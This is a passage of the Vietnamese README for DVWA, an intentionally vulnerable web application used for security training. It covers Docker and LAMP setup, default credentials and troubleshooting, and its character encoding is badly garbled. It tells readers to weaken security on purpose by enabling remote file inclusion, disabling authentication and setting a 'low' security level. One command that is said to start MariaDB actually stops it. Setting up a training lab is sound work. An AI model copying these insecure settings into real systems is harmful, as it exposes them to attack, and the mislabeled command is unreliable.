Docker táģĢ package manager lÃĒn phiÃĒn báēŖn upstream yÃĒu cáē§u báēĄn gáģĄ cài đáēˇt cÃĄc phiÃĒn báēŖn cÅŠ nhÆ° trong hÆ°áģ›ng dáēĢn sáģ­ dáģĨng dành cho [Ubuntu](https://docs.docker.com/engine/install/ubuntu/#uninstall-old-versions), [Fedora](https://docs.docker.com/engine/install/fedora/#uninstall-old-versions) và cÃĄc distro khÃĄc. +Dáģ¯ liáģ‡u Docker (containers, images, volumes, etc.) sáēŊ không báģ‹ áēŖnh hÆ°áģŸng nhÆ°ng náēŋu nhÆ° cÃŗ láģ—i xáēŖy ra, hÃŖy [bÃĄo cÃĄo cho Docker](https://www.docker.com/support) và tÃŦm kiáēŋm cÃĄch đáģƒ sáģ­a láģ—i. + +HÃŖy báē¯t đáē§u: + +1. CháēĄy `docker version` và `docker compose version` đáģƒ xem báēĄn đÃŖ cài đáēˇt Docker và Docker Compose đÃēng cÃĄch chÆ°a. BáēĄn sáēŊ cÃŗ tháģƒ xem phiÃĒn báēŖn cáģ§a chÃēng trong output. + + Ví dáģĨ: + + ```text + >>> docker version + Client: + [...] + Version: 23.0.5 + [...] + + Server: Docker Desktop 4.19.0 (106363) + Engine: + [...] + Version: 23.0.5 + [...] + + >>> docker compose version + Docker Compose version v2.17.3 + ``` + + Náēŋu báēĄn không tháēĨy gÃŦ hoáēˇc gáēˇp láģ—i không tÃŦm tháēĨy láģ‡nh, hÃŖy làm theo cÃĄc điáģu kiáģ‡n tiÃĒn quyáēŋt đáģƒ cài đáēˇt Docker và Docker Compose. + +2. Clone hoáēˇc download repo này váģ và giáēŖi nÊn (xem [Download](#download)). +3. MáģŸ terminal váēŖ tuy cáē­p vào folder (`DVWA`). +4. CháēĄy `docker compose up -d`. + +DVWA sáēŊ cháēĄy trÃĒn `http://localhost:4280`. + +**LÆ°u ÃŊ ráēąng đáģƒ cháēĄy DVWA trong container, mÃĄy cháģ§ web đang láē¯ng nghe trÃĒn port 4280 thay vÃŦ port 80 thông thÆ°áģng.** +Đáģƒ biáēŋt thÃĒm thông tin váģ quyáēŋt đáģ‹nh này, hÃŖy xem [I want to run DVWA on a different port](#i-want-to-run-dvwa-on-a-different-port). + +#### Local Build + +Náēŋu báēĄn đÃŖ tháģąc hiáģ‡n cÃĄc thay đáģ•i local và muáģ‘n xÃĸy dáģąng dáģą ÃĄn táģĢ local, hÃŖy vào `compose.yml` và thay đáģ•i `pull_policy: always` thành `pull_policy: build`. + +Viáģ‡c cháēĄy `docker compose up -d` sáēŊ kích hoáēĄt Docker xÃĸy dáģąng image táģĢ local báēĨt káģƒ nháģ¯ng gÃŦ cÃŗ sáēĩn trong registry. + +Xem thÃĒm: [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +### PhiÃĒn báēŖn PHP + +LÃŊ tÆ°áģŸng nháēĨt là báēĄn nÃĒn sáģ­ dáģĨng phiÃĒn báēŖn PHP áģ•n đáģ‹nh máģ›i nháēĨt vÃŦ đÃŗ là phiÃĒn báēŖn mà áģŠng dáģĨng này sáēŊ đưáģŖc phÃĄt triáģƒn và tháģ­ nghiáģ‡m. + +Náēŋu báēĄn sáģ­ dáģĨng PHP 5.x thÃŦ sáēŊ không đưáģŖc háģ— tráģŖ. + +CÃĄc phiÃĒn báēŖn dÆ°áģ›i 7.3 cÃŗ cÃĄc váēĨn đáģ sáēŊ gÃĸy ra láģ—i, háē§u háēŋt áģŠng dáģĨng sáēŊ hoáēĄt đáģ™ng nhÆ°ng chuyáģ‡n gÃŦ cÅŠng cÃŗ tháģƒ xáēŖy ra. TráģĢ khi báēĄn cÃŗ lÃŊ do chính Ä‘ÃĄng đáģƒ sáģ­ dáģĨng phiÃĒn báēŖn cÅŠ nhÆ° váē­y, náēŋu không sáēŊ không đưáģŖc háģ— tráģŖ. + +### Linux Packages + +Náēŋu báēĄn đang sáģ­ dáģĨng báēŖn distro Linux dáģąa trÃĒn Debian, báēĄn sáēŊ cáē§n cài đáēˇt cÃĄc gÃŗi sau _(hoáēˇc tÆ°ÆĄng Ä‘Æ°ÆĄng)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +BáēĄn nÃĒn cáē­p nháē­t trÆ°áģ›c đÃŗ đáģƒ đáēŖm báēŖo ráēąng báēĄn sáēŊ nháē­n đưáģŖc phiÃĒn báēŖn máģ›i nháēĨt cáģ§a máģi tháģŠ. + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +Trang web sáēŊ hoáēĄt đáģ™ng váģ›i MySQL thay vÃŦ MariaDB nhÆ°ng chÃēng tôi đáēˇc biáģ‡t khuyÃĒn dÚng MariaDB vÃŦ nÃŗ hoáēĄt đáģ™ng táģ‘t trong khi báēĄn pháēŖi tháģąc hiáģ‡n cÃĄc thay đáģ•i đáģƒ MySQL hoáēĄt đáģ™ng chính xÃĄc. + +## CáēĨu hÃŦnh + +### File cáēĨu hÃŦnh + +DVWA gáģ­i kèm máģ™t báēŖn sao dummy cáģ§a file cáēĨu hÃŦnh mà báēĄn sáēŊ cáē§n copy ráģ“i tháģąc hiáģ‡n cÃĄc thay đáģ•i thích háģŖp. TrÃĒn Linux, giáēŖ sáģ­ báēĄn đang áģŸ trong folder DVWA, viáģ‡c này cÃŗ tháģƒ đưáģŖc tháģąc hiáģ‡n nhÆ° sau: + +`cp config/config.inc.php.dist config/config.inc.php` + +TrÃĒn Windows, viáģ‡c này cÃŗ tháģƒ khÃŗ hÆĄn máģ™t chÃēt náēŋu báēĄn đang áēŠn pháē§n file extension. Náēŋu báēĄn không cháē¯c cháē¯n váģ điáģu này, blog này sáēŊ giáēŖi thích thÃĒm váģ điáģu đÃŗ: + +[How to Make Windows Show File Extensions](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Database Setup + +Database setup ráēĨt Ä‘ÆĄn giáēŖn báēąng cÃĄch nháēĨn `Setup DVWA` trÃĒn menu chính, sau đÃŗ nháēĨn `Create / Reset Database`. Tanh áēĨy sáēŊ táēĄo/reset database cho báēĄn váģ›i máģ™t sáģ‘ dáģ¯ liáģ‡u. + +Náēŋu báēĄn gáēˇp láģ—i khi cáģ‘ gáē¯ng táēĄo database, hÃŖy đáēŖm báēŖo thông tin xÃĄc tháģąc database cáģ§a báēĄn là chính xÃĄc trong `./config/config.inc.php`. _File này khÃĄc váģ›i config.inc.php.dist (file ví dáģĨ)._ + +CÃĄc biáēŋn máēˇc đáģ‹nh nhÆ° sau: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +LÆ°u ÃŊ, náēŋu báēĄn đang sáģ­ dáģĨng MariaDB cháģŠ không pháēŖi MySQL (MariaDB là máēˇc đáģ‹nh trong Kali), thÃŦ báēĄn không tháģƒ sáģ­ dáģĨng root use cáģ§a database, báēĄn pháēŖi táēĄo ngÆ°áģi dÚng database máģ›i. Đáģƒ tháģąc hiáģ‡n viáģ‡c này, hÃŖy káēŋt náģ‘i váģ›i database váģ›i tÆ° cÃĄch là root user, sau đÃŗ sáģ­ dáģĨng cÃĄc láģ‡nh sau: + +```mariadb +MariaDB [(none)]> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +MariaDB [(none)]> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Táē¯t XÃĄc Tháģąc (Authentication) + +Máģ™t sáģ‘ tool không hoáēĄt đáģ™ng táģ‘t váģ›i xÃĄc tháģąc nÃĒn không tháģƒ sáģ­ dáģĨng váģ›i DVWA. Đáģƒ giáēŖi quyáēŋt váēĨn đáģ này, cÃŗ máģ™t tÚy cháģn cáēĨu hÃŦnh đáģƒ táē¯t tính năng kiáģƒm tra xÃĄc tháģąc. Đáģƒ tháģąc hiáģ‡n, báēĄn cháģ‰ cáē§n đáēˇt thông tin sau trong file cáēĨu hÃŦnh: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +BáēĄn cÅŠng sáēŊ cáē§n đáēˇt máģŠc báēŖo máē­t thành máģŠc phÚ háģŖp váģ›i tháģ­ nghiáģ‡m báēĄn muáģ‘n tháģąc hiáģ‡n: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +Váģ›i cáēĨu hÃŦnh này, báēĄn cÃŗ tháģƒ truy cáē­p táēĨt cáēŖ cÃĄc tính năng mà không cáē§n đăng nháē­p và đáēˇt báēĨt káģŗ cookie nào. + +### Quyáģn cÅŠa folder + +- `./hackable/uploads/` - Dáģ‹ch váģĨ web cáē§n cÃŗ kháēŖ năng ghi đưáģŖc (đáģ‘i váģ›i táēŖi file lÃĒn). + +### CáēĨu hÃŦnh PHP + +TrÃĒn Linux, hÃŖy vào `/etc/php/x.x/fpm/php.ini` hoáēˇc `/etc/php/x.x/apache2/php.ini`. + +- Đáģƒ cho phÊp Bao gáģ“m file remote (Remote File Inclusions - RFI): + + - `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + - `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] + +- Đáģƒ đáēŖm báēŖo PHP hiáģƒn tháģ‹ táēĨt cáēŖ cÃĄc thông bÃĄo láģ—i: + - `display_errors = on` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + - `display_startup_errors = on` [[display_startup_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-startup-errors)] + +ĐáēŖm báēŖo báēĄn kháģŸi đáģ™ng láēĄi dáģ‹ch váģĨ php hoáēˇc Apache sau khi tháģąc hiáģ‡n cÃĄc thay đáģ•i. + +### reCAPTCHA + +NÆ°áģ›c này cháģ‰ cáē§n cho lab "Insecure CAPTCHA", náēŋu báēĄn không làm lab thÃŦ cÃŗ tháģƒ báģ qua + +ĐÃŖ táēĄo máģ™t cáēˇp API key táģĢ . + +Sau đÃŗ copy vào pháē§n`./config/config.inc.php`: + +- `$_DVWA[ 'recaptcha_public_key' ]` +- `$_DVWA[ 'recaptcha_private_key' ]` + +### Thông tin xÃĄc tháģąc máēˇc đáģ‹nh (Default credentials) + +**Default username = `admin`** + +**Default password = `password`** + +_...cÃŗ tháģƒ dáģ… báģ‹ brute forced ;)_ + +Login URL: http://127.0.0.1/login.php + +_LÆ°u ÃŊ: URl này sáēŊ khÃĄc náēŋu báēĄn cài đáēˇt DVWA vào máģ™t folder khÃĄc._ + +- - - + +## Troubleshooting + +HÆ°áģ›ng dáēĢn này giáēŖ sáģ­ báēĄn đang sáģ­ dáģĨng distro dáģąa trÃĒn Debian, cháēŗng háēĄn nhÆ° Debian, Ubuntu và Kali. Đáģ‘i váģ›i cÃĄc distro khÃĄc, hÃŖy tiáēŋp táģĨc làm theo, nhÆ°ng hÃŖy cáē­p nháē­t láģ‡nh khi cáē§n. + +### Containers + +#### Tôi muáģ‘n xem logs + +Náēŋu báēĄn đang sáģ­ dáģĨng Docker Desktop, logs cÃŗ tháģƒ đưáģŖc truy cáē­p táģĢ áģŠng dáģĨng. +Máģ™t sáģ‘ chi tiáēŋt nháģ cÃŗ tháģƒ thay đáģ•i váģ›i cÃĄc phiÃĒn báēŖn máģ›i hÆĄn, nhÆ°ng cÆĄ báēŖn là giáģ‘ng nhau. + +![Táģ•ng quan cáģ§a DVWA compose](./docs/graphics/docker/overview.png) +![Xem DVWA logs](docs/graphics/docker/detail.png) + +Logs cÃŗ tháģƒ đưáģŖc xem táģĢ terminal. + +1. MáģŸ terminal vào vào folder DVWA +2. Xem logs + + ```shell + docker compose logs + ``` + + Náēŋu báēĄn muáģ‘n export logs ra file riÃĒng, e.g. `dvwa.log` + + ```shell + docker compose logs >dvwa.log + ``` + +#### Tôi muáģ‘n cháēĄy DVWA trÃĒn port khÃĄc + +ChÃēng tôi không sáģ­ dáģĨng port 80 nhÆ° máēˇc đáģ‹nh vÃŦ máģ™t sáģ‘ lÃŊ do: + +- Máģ™t sáģ‘ ngÆ°áģi dÚng cÃŗ tháģƒ đÃŖ cháēĄy gÃŦ đÃŗ trÃĒn port 80. +- Máģ™t sáģ‘ ngÆ°áģi dÚng cÃŗ tháģƒ đang sáģ­ dáģĨng rootless container engine (nhÆ° Podman) và 80 là cáģ•ng đáēˇc quyáģn (< 1024). CáēĨu hÃŦnh thÃĒm (e.g. cài đáēˇt `net.ipv4.ip_unprivileged_port_start`) là cáē§n thiáēŋt nhÆ°ng báēĄn pháēŖi táģą tÃŦm hiáģƒu. + +báēĄn cÃŗ tháģƒ expose DVWA trÃĒn port khÃĄc báēąng cÃĄch sáģ­ port binding trong `compose.yml`. +Ví dáģĨ, báēĄn cÃŗ tháģƒ thay đáģ•i: + +```yml +ports: + - 127.0.0.1:4280:80 +``` + +thành + +```yml +ports: + - 127.0.0.1:8806:80 +``` + +DVWA sáēŊ cháēĄy trÃĒn `http://localhost:8806`. + +Trong trÆ°áģng háģŖp báēĄn muáģ‘n DVWA không cháģ‰ cÃŗ tháģƒ truy cáē­p đưáģŖc táģĢ thiáēŋt báģ‹ cáģ§a riÃĒng báēĄn mà cÃ˛n +trÃĒn máēĄng local cáģ§a báēĄn (ví dáģĨ: vÃŦ báēĄn đang thiáēŋt láē­p mÃĄy tháģ­ nghiáģ‡m cho workshop), báēĄn +cÃŗ tháģƒ xÃŗa `127.0.0.1:` kháģi port mapping (hoáēˇc thay tháēŋ nÃŗ báēąng IP LAN cáģ§a báēĄn). Báēąng cÃĄch này +sáēŊ nghe trÃĒn táēĨt cáēŖ cÃĄc thiáēŋt báģ‹ cÃŗ sáēĩn. Máēˇc đáģ‹nh an toàn pháēŖi luôn là cháģ‰ listen trÃĒn +thiáēŋt báģ‹ loopback local. XÊt cho cÚng, đÃĸy là máģ™t áģŠng dáģĨng web dáģ… báģ‹ táēĨn công, cháēĄy trÃĒn mÃĄy cáģ§a báēĄn. + +#### DVWA táģą đáģ™ng cháēĄy khi Docker cháēĄy + +File [`compose.yml`](./compose.yml) sáēŊ táģą đáģ™ng cháēĄy DVWA và database khi Docker cháēĄy. + +Náēŋu báēĄn không muáģ‘n, xÃŗa hoáēˇc comment dÃ˛ng `restart: unless-stopped` trong [`compose.yml`](./compose.yml). + +Náēŋu báēĄn muáģ‘n táē¯t táēĄm tháģi, báēĄn cÃŗ tháģƒ cháēĄy `docker compose stop`, hoáēˇc xài Docker Desktop, tÃŦm `dvwa` và nháēĨn Stop. +ThÃĒm vào đÃŗ, báēĄn cÃŗ tháģƒ xÃŗa containers, hoáēˇc cháēĄy `docker compose down`. + +### Log files + +TrÃĒn Linux, Apache táēĄo 2 file log máēˇc đáģ‹nh, `access.log` và `error.log` và trÃĒn háģ‡n tháģ‘ng váģ›i náģn táēŖng Debian, cÃĄc file log thÆ°áģng náēąm trong `/var/log/apache2/`. + +Khi gáģ­i bÃĄo cÃĄo láģ—i, sáģą cáģ‘ hoáēˇc báēĨt káģŗ điáģu gÃŦ tÆ°ÆĄng táģą, vui lÃ˛ng bao gáģ“m ít nháēĨt năm dÃ˛ng cuáģ‘i cÚng táģĢ máģ—i file này. TrÃĒn cÃĄc distro dáģąa trÃĒn Debian, báēĄn cÃŗ tháģƒ nháē­n đưáģŖc nháģ¯ng tháģŠ nhÆ° tháēŋ này: + +``` +tail -n 5 /var/log/apache2/access.log /var/log/apache2/error.log +``` + +### Truy cáē­p vào site nhÆ°ng nháē­n 404 + +Náēŋu báēĄn gáēˇp láģ—i này thi báēĄn cáē§n hiáģƒu rÃĩ váģ váģ‹ trí cáģ§a file. Máēˇc đáģ‹nh, folder gáģ‘c cáģ§a tài liáģ‡u Apache (nÆĄi báē¯t đáē§u tÃŦm kiáēŋm náģ™i dung web) là `/var/www/html`. Náēŋu báēĄn đáēˇt file `hello.txt` trong folder này, đáģƒ truy cáē­p nÃŗ báēĄn cáē§n duyáģ‡t đáēŋn `http://localhost/hello.txt`. + +Náēŋu báēĄn đÃŖ táēĄo máģ™t folder và đáēˇt file vào đÃŗ - `/var/www/html/mydir/hello.txt` - sau đÃŗ báēĄn sáēŊ cáē§n pháēŖi duyáģ‡t đáēŋn `http://localhost/mydir/hello.txt`. + +Linux theo máēˇc đáģ‹nh cÃŗ phÃĸn biáģ‡t cháģ¯ hoa cháģ¯ thÆ°áģng, trong ví dáģĨ trÃĒn, náēŋu báēĄn cáģ‘ duyáģ‡t đáēŋn báēĨt káģŗ trang nào trong sáģ‘ này, báēĄn sáēŊ nháē­n đưáģŖc máģ™t `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +Điáģu này áēŖnh hÆ°áģŸng đáēŋn DVWA nhÆ° tháēŋ nào? Háē§u háēŋt máģi ngÆ°áģi sáģ­ dáģĨng git đáģƒ checkout DVWA vào `/var/www/html`, báēĄn sáēŊ đưáģŖc đưa táģ›i `/var/www/html/DVWA/` váģ›i táēĨt cáēŖ cÃĄc file DVWA bÃĒn trong nÃŗ. Sau đÃŗ háģ duyáģ‡t đáēŋn `http://localhost/` và nháē­n đưáģŖc `404` hoáēˇc trang welcome máēˇc đáģ‹nh cáģ§a Apache. VÃŦ file náēąm trong DVWA, báēĄn pháēŖi duyáģ‡t táģ›i `http://localhost/DVWA`. + +Máģ™t láģ—i pháģ• biáēŋn khÃĄc là duyáģ‡t đáēŋn `http://localhost/dvwa` sáēŊ dáēĢn đáēŋn `404` vÃŦ `dvwa` không pháēŖi `DVWA` liÃĒn quan đáēŋn viáģ‡c kháģ›p folder trong Linux. + +VÃŦ váē­y, sau khi thiáēŋt láē­p, náēŋu báēĄn cáģ‘ truy cáē­p trang web và nháē­n đưáģŖc `404`, hÃŖy nghÄŠ xem báēĄn đÃŖ cài đáēˇt cÃĄc file vào đÃĸu, váģ‹ trí cáģ§a chÃēng cÃŗ liÃĒn quan đáēŋn folder gáģ‘c cáģ§a tài liáģ‡u và trÆ°áģng háģŖp cáģ§a folder báēĄn đÃŖ sáģ­ dáģĨng là gÃŦ. + +### "Access denied" khi setup + +Náēŋu báēĄn tháēĨy thông bÃĄo sau khi cháēĄy script thiáēŋt láē­p, điáģu đÃŗ cÃŗ nghÄŠa là tÃĒn ngÆ°áģi dÚng hoáēˇc máē­t kháēŠu trong file cáēĨu hÃŦnh không kháģ›p váģ›i tÃĒn ngÆ°áģi dÚng hoáēˇc máē­t kháēŠu đưáģŖc đáģ‹nh cáēĨu hÃŦnh trÃĒn database: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +Láģ—i cho báēĄn biáēŋt ráēąng báēĄn đang sáģ­ dáģĨng tÃĒn ngÆ°áģi dÚng `notdvwa`. + +Láģ—i sau đÃĸy cho biáēŋt báēĄn đÃŖ tráģ file cáēĨu hÃŦnh vào database sai. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +Láģ—i bÃĄo ráēąng báēĄn đang sáģ­ dáģĨng ngÆ°áģi dÚng `dvwa` và đang cáģ‘ gáē¯ng káēŋt náģ‘i váģ›i database `notdvwa`. + +Điáģu đáē§u tiÃĒn cáē§n làm là kiáģƒm tra káģš xem báēĄn nghÄŠ mÃŦnh đÃŖ đáēˇt gÃŦ trong file cáēĨu hÃŦnh cÃŗ tháģąc sáģą áģŸ đÃŗ không. + +Náēŋu nhÆ° báēĄn đÃŖ cháē¯c cháē¯n, viáģ‡c tiáēŋp theo cáē§n làm là kiáģƒm tra xem báēĄn cÃŗ tháģƒ đăng nháē­p váģ›i tÆ° cÃĄch ngÆ°áģi dÚng trÃĒn command line hay không. GiáēŖ sáģ­ báēĄn cÃŗ ngÆ°áģi dÚng database là `dvwa` và máē­t kháēŠu là `p@ssw0rd`, hÃŖy cháēĄy láģ‡nh sau: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +_LÆ°u ÃŊ: Không cÃŗ khoáēŖng tráē¯ng sau -p_ + +Náēŋu báēĄn tháēĨy nhÆ° sau thÃŦ máē­t kháēŠu là chính xÃĄc: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +VÃŦ báēĄn cÃŗ tháģƒ káēŋt náģ‘i trÃĒn dÃ˛ng láģ‡nh, nÃĒn cÃŗ tháģƒ đÃŖ xáēŖy ra láģ—i trong file cáēĨu hÃŦnh, hÃŖy kiáģƒm tra káģš và sau đÃŗ nÃĒu váēĨn đáģ náēŋu báēĄn váēĢn không tháģƒ làm máģi tháģŠ hoáēĄt đáģ™ng. + +Náēŋu báēĄn tháēĨy thông bÃĄo sau thÃŦ tÃĒn ngÆ°áģi dÚng hoáēˇc máē­t kháēŠu báēĄn đang sáģ­ dáģĨng không đÃēng. Tháģ­ láēĄi bÆ°áģ›c [Database Setup](#database-setup) và đáēŖm báēŖo báēĄn sáģ­ dáģĨng cÚng tÃĒn ngÆ°áģi dÚng và máē­t kháēŠu trong suáģ‘t quÃĄ trÃŦnh. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +Náēŋu báēĄn nháē­n đưáģŖc thông tin sau thÃŦ thông tin đăng nháē­p cáģ§a ngÆ°áģi dÚng là chính xÃĄc nhÆ°ng ngÆ°áģi dÚng không cÃŗ quyáģn truy cáē­p vào database. Máģ™t láē§n náģ¯a, hÃŖy láēˇp láēĄi cÃĄc bÆ°áģ›c thiáēŋt láē­p và kiáģƒm tra tÃĒn database báēĄn đang sáģ­ dáģĨng. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +Láģ—i cuáģ‘i cÚng báēĄn cÃŗ tháģƒ gáēˇp pháēŖi là: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +ĐÃĸy không pháēŖi là láģ—i xÃĄc tháģąc mà là mÃĄy cháģ§ database không cháēĄy. HÃŖy tháģ­: + +```sh +sudo service mysql start +``` + +### TáģĢ cháģ‘i káēŋt náģ‘i + +Máģ™t láģ—i tÆ°ÆĄng táģą nhÆ° láģ—i này: + +``` +Fatal error: Uncaught mysqli_sql_exception: Connection refused in /var/sites/dvwa/non-secure/htdocs/dvwa/includes/dvwaPage.inc.php:535 +``` + +CÃŗ nghÄŠa là mÃĄy cháģ§ database cáģ§a báēĄn không cháēĄy hoáēˇc báēĄn đÃŖ nháē­p sai đáģ‹a cháģ‰ IP trong file cáēĨu hÃŦnh. + +Kiáģƒm tra dÃ˛ng này trong file cáēĨu hÃŦnh đáģƒ xem mÃĄy cháģ§ database dáģą kiáēŋn sáēŊ áģŸ đÃĸu: + +``` +$_DVWA[ 'db_server' ] = '127.0.0.1'; +``` + +Sau đÃŗ đi đáēŋn mÃĄy cháģ§ này và kiáģƒm tra xem nÃŗ cÃŗ đang cháēĄy không. Trong Linux, cháēĄy: + +``` +systemctl status mariadb.service +``` + +Và báēĄn đang tÃŦm kiáēŋm tháģŠ gÃŦ đÃŗ nhÆ° sau, quan tráģng là nÃŗ ghi `active (running)`. + +``` +● mariadb.service - MariaDB 10.5.19 database server + Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; preset: enabled) + Active: active (running) since Thu 2024-03-14 16:04:25 GMT; 1 week 5 days ago +``` + +Náēŋu nÃŗ không cháēĄy, báēĄn cÃŗ tháģƒ kháģŸi đáģ™ng nÃŗ báēąng: + +``` +sudo systemctl stop mariadb.service +``` + +LÆ°u ÃŊ `sudo` và đáēŖm báēŖo báēĄn nháē­p máē­t kháēŠu ngÆ°áģi dÚng Linux cáģ§a mÃŦnh náēŋu đưáģŖc yÃĒu cáē§u. + +Trong Windows, hÃŖy kiáģƒm tra tráēĄng thÃĄi trong báēŖng điáģu khiáģƒn XAMPP. + +### PhÆ°ÆĄng tháģŠc xÃĄc tháģąc không xÃĄc đáģ‹nh + +Váģ›i cÃĄc phiÃĒn báēŖn máģ›i nháēĨt cáģ§a MySQL, PHP không cÃ˛n cÃŗ tháģƒ giao tiáēŋp váģ›i database áģŸ cáēĨu hÃŦnh máēˇc đáģ‹nh cáģ§a nÃŗ náģ¯a. Náēŋu báēĄn cháēĄy script thiáēŋt láē­p và nháē­n đưáģŖc thông bÃĄo sau thÃŦ là báēĄn đÃŖ cáēĨu hÃŦnh nÃŗ. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +BáēĄn cÃŗ hai láģąa cháģn, Ä‘ÆĄn giáēŖn nháēĨt là gáģĄ cài đáēˇt MySQL và cài đáēˇt MariaDB. Sau đÃĸy là hÆ°áģ›ng dáēĢn chính tháģŠc táģĢ project MariaDB: + + + +Ngoài ra, hÃŖy làm theo cÃĄc bÆ°áģ›c sau: + +1. Váģ›i quyáģn root, cháģ‰nh sáģ­a file: `/etc/mysql/mysql.conf.d/mysqld.cnf` +1. DÆ°áģ›i dÃ˛ng `[mysqld]`, thÃĒm vào nhÆ° sau: + `default-authentication-plugin=mysql_native_password` +1. Restart database: `sudo service mysql restart` +1. Kiáģƒm tra phÆ°ÆĄng tháģŠc xÃĄc tháģąc cho ngÆ°áģi dÚng database cáģ§a báēĄn: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +- - -- - -- - - - -+- - -- - -- - -- - -- - -- - -+- - -- - -- - -- - -- - -- - -- - - - -+ + | Host | User | plugin | + +- - -- - -- - - - -+- - -- - -- - -- - -- - -- - -+- - -- - -- - -- - -- - -- - -- - - - -+ + | localhost | dvwa | caching_sha2_password | + +- - -- - -- - - - -+- - -- - -- - -- - -- - -- - -+- - -- - -- - -- - -- - -- - -- - - - -+ + 1 rows in set (0.00 sec) + ``` + +1. BáēĄn sáēŊ tháēĨy `caching_sha2_password`. Náēŋu cÃŗ , hÃŖy cháēĄy: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +1. CháēĄy láēĄi check, báēĄn sáēŊ tháēĨy `mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +- - -- - -- - - - -+- - -- - -+- - -- - -- - -- - -- - -- - -- - - - -+ + | Host | User | plugin | + +- - -- - -- - - - -+- - -- - -+- - -- - -- - -- - -- - -- - -- - - - -+ + | localhost | dvwa | mysql_native_password | + +- - -- - -- - - - -+- - -- - -+- - -- - -- - -- - -- - -- - -- - - - -+ + 1 row in set (0.00 sec) + ``` + +Sau cÚng, quÃĄ trÃŦnh thiáēŋt láē­p sáēŊ hoáēĄt đáģ™ng nhÆ° bÃŦnh thÆ°áģng. + +Náēŋu báēĄn muáģ‘n biáēŋt thÃĒm thông tin, hÃŖy xem trang sau: . + +### Láģ—i Database #2002: No such file or directory. + +MÃĄy cháģ§ database không cháēĄy. Náēŋu nhÆ° báēĄn sáģ­ dáģĨng distro dáģąa trÃĒn Debian, háēŖy cháēĄy: + +```sh +sudo service mysql start +``` + +### Láģ—i "MySQL server has gone away" và "Packets out of order" + +CÃŗ máģ™t sáģ‘ lÃŊ do khiáēŋn báēĄn gáēˇp pháēŖi nháģ¯ng láģ—i này, nhÆ°ng ráēĨt cÃŗ tháģƒ là phiÃĒn báēŖn mÃĄy cháģ§ database báēĄn đang cháēĄy không tÆ°ÆĄng thích váģ›i phiÃĒn báēŖn PHP. + +Điáģu này thÆ°áģng tháēĨy nháēĨt khi báēĄn đang cháēĄy phiÃĒn báēŖn MySQL máģ›i nháēĨt dÆ°áģ›i dáēĄng PHP và nÃŗ không hoáēĄt đáģ™ng táģ‘t. Láģi khuyÃĒn táģ‘t nháēĨt là hÃŖy báģ MySQL và cài đáēˇt MariaDB vÃŦ đÃĸy không pháēŖi là tháģŠ chÃēng tôi cÃŗ tháģƒ háģ— tráģŖ. + +Náēŋu báēĄn muáģ‘n biáēŋt thÃĒm thông tin, hÃŖy xem trang sau + + + +### Command Injection không tháģƒ hoáēĄt đáģ™ng + +Apache cÃŗ tháģƒ không cÃŗ đáēˇc quyáģn đáģ§ cao đáģƒ cháēĄy láģ‡nh trÃĒn mÃĄy cháģ§ web. Náēŋu báēĄn đang cháēĄy DVWA trÃĒn Linux, hÃŖy đáēŖm báēŖo báēĄn đÃŖ đăng nháē­p báēąng quyáģn root. Trong Windows đăng nháē­p váģ›i tÆ° cÃĄch Administrator + +### TáēĄi sao databse không tháģƒ káēŋt náģ‘i váģ›i CentOS? + +CÃŗ tháģƒ báēĄn đang gáēˇp váēĨn đáģ váģ›i SELinux. Táē¯t SELinux hoáēˇc cháēĄy láģ‡nh này đáģƒ cho phÊp mÃĄy cháģ§ web giao tiáēŋp váģ›i database: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Máģ™t sáģ‘ tháģŠ khÃĄc + +Đáģƒ biáēŋt thông tin troubleshooting máģ›i nháēĨt, vui lÃ˛ng đáģc cáēŖ ticket máģŸ và đÃŖ đÃŗng trong repo: + + + +TrÆ°áģ›c khi gáģ­i ticket, vui lÃ˛ng 